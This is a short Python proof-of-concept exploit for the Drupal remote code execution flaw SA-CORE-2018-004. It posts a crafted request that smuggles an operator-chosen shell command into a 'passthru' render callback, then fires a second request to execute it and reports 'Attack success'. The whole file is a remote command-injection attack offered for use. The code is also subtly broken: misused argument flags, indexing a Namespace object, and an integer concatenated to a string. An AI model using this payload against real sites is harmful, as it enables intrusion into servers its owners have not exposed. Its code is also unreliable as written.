# Author: Alexandre Nguyen

import requests
import argparse

parser = argparse.ArgumentParser(description='POC for Drupal vulnerability SA-CORE-2018-004')
parser.add_argument("--command",
                    help="Command to inject",
                    required=True,
                    action='store_true')
parser.add_argument("--node_id",
                    help="Node to target",
                    required=True,
                    action='store_true')
parser.add_argument("--url",
                    help="Drupal base URL",
                    required=True,
                    action='store_true')

args = parser.parse_args()

command = args.command
node_id = args.node_id
url = args.url

php_command = args[0]


def main():
    response = requests.post(
        url + "/?q=node/" + node_id + "/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=" + command)

    if response.json().get("form_build_id") is not None:
        form_build_id = response.json().get("form_build_id")
        response_exec_command = requests.post(
            url + "/drupal/?q=file/ajax/actions/cancel/%23options/path/" + form_build_id)
        if response_exec_command.status_code == 200:
            print('Attack success - command executed !')
        else:
            print('Command failed. HTTP status code:' + response_exec_command.status_code)
    else:
        print('This target is not attackable !')


main()